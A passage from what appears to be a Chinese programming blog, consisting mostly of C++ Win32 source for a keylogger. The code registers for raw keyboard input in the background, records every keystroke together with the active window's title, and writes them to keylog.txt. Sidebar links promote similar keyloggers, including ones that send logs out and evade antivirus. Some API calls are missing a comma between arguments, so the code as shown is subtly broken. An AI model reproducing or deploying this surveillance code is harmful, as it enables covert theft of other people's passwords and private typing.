  50.       TEXT("键盘记录测试"),  // window caption  
  51.       WS_OVERLAPPEDWINDOW,      // window style  
  52.       CW_USEDEFAULT,            // initial x position  
  53.       CW_USEDEFAULT,            // initial y position  
  54.       CW_USEDEFAULT,            // initial x size  
  55.       CW_USEDEFAULT,            // initial y size  
  56.       NULL,                     // parent window handle  
  57.       NULL,                     // window menu handle  
  58.       hInstance,                // program instance handle  
  59.       NULL);                    // creation parameters  
  60.   
  61.    //将键盘记录写入日志文件  
  62.     hFile = InitLogFile();  
  63.   
  64.     if(!RegisitKeyBord(hWnd))  
  65.         return 0;  
  66.         
  67.     ShowWindow(hWnd, SW_SHOW);  
  68.     UpdateWindow(hWnd);  
  69.      
  70.     return 0;  
  71. }  
  72.   
  73. LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)  
  74. {  
  75.     HDC          hdc;  
  76.     PAINTSTRUCT  ps;    
  77.     char vk[256] = {'\0'};  
  78.     char ti[256] = {'\0'};  
  79.     UINT        dwSize;  
  80.     LPBYTE      lpb = NULL;  
  81.     RAWINPUT*   raw = NULL;  
  82.     DWORD       dwWritten = 0;  
  83.   
  84.     PGetRawInputData GetRawInputData = (PGetRawInputData)GetApiAdd("user32.dll""GetRawInputData");  
  85.     
  86.     switch(message)  
  87.     {  
  88.     case WM_INPUT:  
  89.        if(NULL == GetRawInputData)  
  90.        {  
  91.            DefWindowProc(hWnd, message, wParam, lParam);  
  92.            return 0;  
  93.        }   
  94.        GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER));  
  95.        lpb = new BYTE[dwSize];  
  96.        if(lpb == NULL)   
  97.        {  
  98.            DefWindowProc(hWnd, message, wParam, lParam);  
  99.            return 0;  
  100.        }   
  101.          
  102.        if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, lpb, &dwSize, sizeof(RAWINPUTHEADER)) != dwSize)  
  103.            break;  
  104.          
  105.        raw = (RAWINPUT*)lpb;  
  106.          
  107.        if (raw->header.dwType == RIM_TYPEKEYBOARD)   
  108.        {  
  109.             if ( prev == NULL)  
  110.             {  
  111.                 prev = GetForegroundWindow();  
  112.                 GetWindowText(prev,ti,256);  
  113.                 wsprintf(vk,"[%s]\r\n%s",&ti,GetKeyName(raw->data.keyboard.VKey));  
  114.             }  
  115.             else if ( prev == GetForegroundWindow() )  
  116.             {  
  117.                 wsprintf(vk,"%s",GetKeyName(raw->data.keyboard.VKey));  
  118.             }  
  119.             else  
  120.             {  
  121.                prev = GetForegroundWindow();  
  122.                GetWindowText(prev,ti,256);  
  123.                wsprintf(vk,"\r\n\r\n[%s]\r\n%s",&ti,GetKeyName(raw->data.keyboard.VKey));  
  124.              }  
  125.   
  126.             if(hFile != INVALID_HANDLE_VALUE && ((WM_KEYDOWN == raw->data.keyboard.Message) || (WM_SYSKEYDOWN == raw->data.keyboard.Message)))  
  127.             {  
  128.                 SetFilePointer(hFile, 0, NULL, FILE_END);  
  129.                 WriteFile(hFile, vk, (DWORD)strlen(vk), &dwWritten, NULL);  
  130.             }  
  131.        }  
  132.        delete[] lpb;   
  133.        DefWindowProc(hWnd, message, wParam, lParam);  
  134.        return 0;  
  135.   
  136.    case WM_PAINT:  
  137.       hdc = BeginPaint(hWnd, &ps);  
  138.       TextOut(hdc, 10, 10, szInfo, strlen(szInfo));  
  139.       TextOut(hdc, 10, 30, szTips, strlen(szTips));  
  140.       EndPaint(hWnd, &ps);  
  141.       return 0;  
  142.   
  143.    case WM_DESTROY:  
  144.       PostQuitMessage(0);  
  145.       CloseHandle(hFile);  
  146.       return 0;  
  147.   
  148.    default:  
  149.       return DefWindowProc(hWnd, message, wParam, lParam);  
  150.    }  
  151. }  
  152.   
  153. HANDLE InitLogFile(void)  
  154. {  
  155.     HANDLE hFile = CreateFile("keylog.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);  
  156.     return hFile;  
  157. }  
  158.   
  159. PVOID GetApiAdd(LPCSTR dllname, LPCSTR procname)  
  160. {  
  161.     HMODULE hDll = LoadLibraryA(dllname);  
  162.     if(NULL == hDll)  
  163.         return NULL;  
  164.     PVOID pProc = GetProcAddress(hDll, procname);  
  165.     FreeLibrary(hDll);  
  166.     return pProc;  
  167. }  
  168.   
  169. BOOL RegisitKeyBord(HWND hwnd)  
  170. {  
  171.     if(NULL == hwnd)  
  172.         return false;  
  173.   
  174.     PRegisterRawInputDevices RegisterRawInputDevices = (PRegisterRawInputDevices)GetApiAdd("User32.dll""RegisterRawInputDevices");  
  175.     if(NULL == RegisterRawInputDevices)  
  176.         return false;  
  177.       
  178.     RAWINPUTDEVICE rid;  
  179.     rid.usUsagePage = 0x01;  
  180.     rid.usUsage = 0x06;  
  181.     rid.dwFlags = RIDEV_INPUTSINK;  
  182.     rid.hwndTarget = hwnd;  
  183.   
  184.     return RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE));  
  185. }  
这家伙很懒什么都没留下
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++ Windows上键盘拦截
老狼的专栏
08-24 282
如果是键盘拦截,需要将KeyboardHookCallback函数事件进行处理,接收消息以后直接返回,而不是将事件传递给下一个钩子或默认过程。如果是仅仅拦截某个进程键盘事件,只需要修改SetWindowsHookEx第3、4个参数即可。
C++ Qt拦截系统键盘(Windows)
最新发布
老狼的专栏
08-24 387
【代码】C++ Qt拦截系统键盘(Windows)
键盘记录及自动发送VC++实现
千里之外
09-23 4840
正文: 首先我想向大家说明的是: 1、   现在这个软体已经被某些杀毒软件(nod32、瑞星等)偶尔报为病毒了; 2、   本软件仅供学习使用; 3、   软件的很多代码为他人所有,我是直接拿来使用,我并不保留这个软件及代码的任何所有权,大家可以随便转载,但请帮我宣传我的
原始输入键盘钩子(raw input hook)
07-19
使用原始输入(raw input),设置全局键盘钩子,来hook键盘消息。源码来自codeproject。
Keylog_日志logkey_Windows编程_Windows键盘鼠标窗口事件记录器_visualc++_
10-01
这个项目名为"Keylog_日志logkey_Windows编程_Windows键盘鼠标窗口事件记录器_visualc++",显然它是用Visual C++实现的一个Windows键盘鼠标窗口事件记录器。接下来,我们将深入探讨相关的知识点。 首先,我们要理解...
编程语言-基于VisualC++的汽车AMT性能检测系统软件平台设计.pdf
06-25
编程语言-基于VisualC++的汽车AMT性能检测系统软件平台设计.pdf
VC6-0上机指导-VisualC++6-0编程环境.pdf
11-16
VC6-0上机指导-VisualC++6-0编程环境.pdf
ovstation-master_Windows编程_visualc++_mifare_mfocGUI_v29_
09-29
mfocGUI_v29_Release_Compiled
VisualC 实效编程 114 截获键盘信息
06-28
VisualC 实效编程 114 截获键盘信息VisualC 实效编程 114 截获键盘信息VisualC 实效编程 114 截获键盘信息VisualC 实效编程 114 截获键盘信息VisualC 实效编程 114 截获键盘信息VisualC 实效编程 114 截获键盘信息...
无钩子的键盘记录完美实现(VC++)
09-07
VC++实现无钩子的键盘记录键盘记录是木马常需具备的重要功能,但是一般的键盘记录都是通过钩子(HOOK)的方式实现,此方式一般都会被杀软监视,进而导致失败。本文通过无钩子的方式实现键盘记录,杀软不会有任何警报异常。
VC++ 支持中文的全局键盘钩子.rar
02-16
既可以支持中文,又可以支持英文。非常好用。
用Detours实现APIHOOK
Lassewang的成长历程
08-15 4113
用Detours实现APIHOOK Detours是一个软件开发库,它用于实现拦截Win32二进制代码中的API函数。 它使用一个Jmp指令替换了目标函数的前面几个字节,使得控制直接调用实现的 Detours函数。并通过一个trampoline函数保留了原来函数的功能调用。 我们知道,实现APIHOOK主要有两个重要环节,一是如何把代码注入到目标地 址空间,二是如何让自己的代码被调用。
vc++HOOK详细讲解
独旅天涯
08-21 8580
消息钩子函数入门  Windows 系统是建立在事件驱动的机制上的,说穿了就是整个系统都是通过消息的传递来实 现的。而钩子是 Windows 系统中非常重要的系统接口,用它可以截获并处理送给其他应用 程序的消息,来完成普通应用程序难以实现的功能。钩子可以监视系统或进程中的各种事件 消息,截获发往目标窗口的消息并进行处理。这样,我们就可以在系统中安装自定义的钩子, 监视系统中特定事件的发生
跨进程API Hook
小发猫
06-15 2116
跨进程API Hook cncpp什么是“跨进程 API Hook”?众所周知Windows应用程序的各种系统功能是通过调用API函数来实现。API Hook就是给系统的API附加上一段小程序,它能监视甚至控制应用程序对API函数的调用。所谓跨进程也就是让自己的程序来控制别人程序的API调用了。API Hook 理论通过对Win32 PE文件的分析(如果你还不熟悉PE文件格式,可以看看Iczeli
打造中英文键盘记录(从原理剖析)
InkSnail的专栏
02-24 1665
偶然在网上看到的,代码网上到处都是,但讲到原理的还真不多原文链接: http://www.hackeye.com/article/5223/打造中英文键盘记录(从原理剖析) 2008年6月16日1,321次阅读 评论 发表评论 0顶一下作者:小鱼 传说中超级
一个中英文键盘记录源代码
weixin_33877885的博客
11-15 418
一个中英文键盘记录源代码 function HookProcEn(ncode:integer;wparam:wparam;lparam:lparam): LRESULT; stdcall;//export;//回调函数 var pcs:pMSG;//定义消息指针 begin Result:= CallNextHookEx(KeyboardHook, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值